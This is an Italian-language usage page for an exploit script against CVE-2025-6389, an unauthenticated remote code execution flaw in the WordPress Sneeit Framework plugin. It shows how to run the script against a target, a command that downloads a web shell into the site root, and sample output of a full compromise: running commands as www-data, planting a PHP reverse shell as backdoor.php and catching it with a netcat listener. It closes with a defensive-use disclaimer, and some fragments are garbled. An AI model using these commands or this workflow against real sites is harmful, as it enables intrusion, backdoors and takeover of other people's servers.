
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 è una vulnerabilità Critica (CVSS 9.8) nel plugin WordPress Sneeit Framework (≤ 8.3), ampiamente utilizzato da temi popolari. Consente esecuzione remota di codice non autenticata — la classe più pericolosa di vulnerabilità web.
# Installa le dipendenze
pip3 install requests colorama
# Controlla la vulnerabilità + ottieni una shell interattiva
python3 CVE-2025-6389.py https://target.com
# Esegui un solo comando
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)Usalo solo su target per i quali sei ufficialmente autorizzato a testare (scope chiaro + RoE).
La vulnerabilità è ancora pesantemente sfruttata in natura in questo momento.
Ecco esattamente cosa vedrai nel tuo terminale quando l'exploit funziona davvero (sfruttamento al 100% di CVE-2025-6389 su un target vulnerabile che esegue Sneeit Framework ≤ 8.3):
[+] VULNERABLE! RCE Confermata!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (pagina phpinfo() completa continua per migliaia di righe)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
Poi sul tuo computer:
nc -lvnp 4444
→ Ottieni immediatamente una reverse shell completamente interattiva come www-data.
[-] Non vulnerabile o bloccato (status: 200)
[+] Output:
(niente / risposta vuota / normale risposta AJAX di WordPress / 403 / 500 senza output)
Saprai che ha funzionato quando vedrai uno di questi:
Tutto qui. Se ottieni uno qualsiasi dei precedenti → piena RCE non autenticata ottenuta.
Incolla qui il tuo output esatto se vuoi che confermi al 100% se ha funzionato o meno.
sneeit_articles_pagination_callback()call_user_func() → esecuzione arbitraria di codiceQueste informazioni sono fornite esclusivamente a scopo difensivo ed educativo 🛡️. Non utilizzarle per sfruttare sistemi che non possiedi o per i quali non hai esplicito permesso di test 🚫. Segui sempre le linee guida legali ed etiche quando lavori con vulnerabilità di sicurezza ⚖️✨